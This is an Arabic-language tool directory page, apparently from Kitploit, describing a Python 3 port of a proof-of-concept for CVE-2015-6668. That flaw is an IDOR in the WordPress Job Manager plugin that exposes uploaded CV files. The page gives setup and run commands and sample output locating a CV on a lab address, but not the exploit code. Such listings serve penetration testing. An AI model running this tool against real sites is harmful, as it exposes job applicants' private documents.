Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-6668 — POC من Evangelos Mourikis لـ CVE-2015-6668 مُحوَّل إلى Python 3. | Kitploit
أدوات/GitHubGitHub/jimdiroffii/cve-2015-6668
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubjimdiroffii/cve-2015-6668

CVE-2015-6668

POC من Evangelos Mourikis لـ CVE-2015-6668 مُحوَّل إلى Python 3.

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2015-6668

إثبات المفهوم (POC) الخاص بـ Evangelos Mourikis لثغرة CVE-2015-6668، مُحوَّل إلى Python 3

يستغل ثغرة IDOR في إضافة Job Manager لووردبريس.

تم اختباره على Python 3.11.9

المراجع

NIST CVE WPScan Vuln DB

الإعداد والاستخدام

استنسخ المستودع، وجهّز البيئة الافتراضية (إذا رغبت)، وثبّت requests، ثم شغّل السكربت باستخدام Python 3.

الاستنساخ

git clone https://github.com/jimdiroffii/CVE-2015-6668.git
cd CVE-2015-6668

البيئة الافتراضية لبايثون (اختياري)

python3 -m venv .venv
  • Bash
source .venv/bin/activate
  • Powershell
.\.venv\Scripts\activate

تثبيت requests

python3 -m pip install requests

تشغيل exploit.py

python3 ./exploit.py

المخرجات

$ python3 ./exploit.py
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25

Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
تنزيل الأداة